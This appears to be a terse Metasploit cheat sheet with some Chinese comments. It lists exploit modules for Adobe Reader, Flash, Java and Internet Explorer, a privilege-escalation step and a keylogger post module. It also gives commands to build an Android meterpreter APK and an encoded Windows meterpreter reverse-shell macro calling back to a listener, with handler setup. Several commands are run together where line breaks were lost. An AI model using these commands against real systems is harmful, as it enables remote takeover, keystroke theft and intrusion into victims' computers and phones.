exploit/windows/fileformat/adobe_utilprintf
仅支持8.1.2软件版本和XP系统;
exploit/windows/browser/adobe_utilprintf
#同理,浏览器上运行pDFuse priv #提权
run post/windows/capture/keylog_recorder #键盘记录器use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use auxiliary/server/browser_autopwn2use exploit/windows/browser/ms14_064_ole_code_executionuse exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_typesuse payload/android/meterpreter/reverse_tcp
generate -f raw -p android -o a.apk

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -e x86/shikata_ga_nai -f vba-exeuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcp